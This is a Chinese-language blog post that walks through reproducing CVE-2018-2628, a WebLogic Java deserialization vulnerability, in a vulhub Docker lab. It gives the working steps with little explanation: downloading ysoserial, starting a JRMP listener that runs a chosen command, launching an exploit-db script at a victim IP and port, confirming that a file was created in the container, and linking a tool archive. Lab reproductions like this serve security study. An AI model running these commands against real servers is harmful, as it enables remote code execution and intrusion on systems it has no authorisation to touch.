漏洞編號：

CVE-2018-2628

漏洞原理：

由於原理佔用篇幅很大，浪費大家很多時間，目前網上也有很多詳細的分析，在這裡就不做『搬運工』了，直接給大家參考連接：

http://blog.topsec.com.cn/ad_lab/cve-2018-2628-weblogic%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E% E5%88%86%E6%9E%90/

http://www.freebuf.com/vuls/169420.html

https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA

漏洞復現：

1、首先需要下載一個國外大佬寫的一款工具ysoserial（http://www.vuln.cn/6295，這裡有針對這款工具的分析）。

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

2、使用ysoserial啟動一個JRMP Server

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
【listen port】是JRMP Server 監聽的端口
【Command】是想要執行命令

3、使用exp向目標發送數據包。（腳本鏈接：https://www.exploit-db.com/exploits/44553/）

zksmile@xxx:~$ python CVE-2018-2628.py
Usage:
exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

[victim ip] :目標IP
[victim port] : 目標端口
[path to ysoserial] ： ysoserial的路徑
[JRMPListener ip] ：步驟2中攻擊機器的IP
[JRMPListener port]: 步驟2中監聽的端口
[JRMPClient] ：使用的是JRMPClient類

zksmile@xxx:~$ python CVE-2018-2628.py 172.18.0.2 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 172.18.0.1 1099 JRMPClient

4、進入docker 容器中，文件已經創建成功。

zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9989f9948b12 vulhub/weblogic "startWebLogic.sh" 7 hours ago Up 7 hours 5556/tcp, 0.0.0.0:7001->7001/tcp cve-2018-2628_weblogic_1
zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker exec -ti 9989f9948b12 /bin/bash
root@9989f9948b12:~/Oracle/Middleware# ls /tmp/
bea1061393648233859820.tmp hsperfdata_root wlstTemproot
cookie.txt packages zksmile.txt
root@9989f9948b12:~/Oracle/Middleware#

5、文中用到腳本工具在下邊壓縮包中。

http://zone.secevery.com/file/download/file_name-emtzbWlsZS56aXA=__url-aHR0cDovL3pvbmUuc2VjZXZlcnkuY29tL3VwbG9hZHMvYXJ0aWNsZS8yMDE4MDgyMi84NzdiODExODM2NDQ0MTNhY2E1ZDQ1OGNlNDNiYjM0YQ==

分享到:

閱讀更多 Web安全陪跑團 的文章

關鍵字: 原理序列化 Docker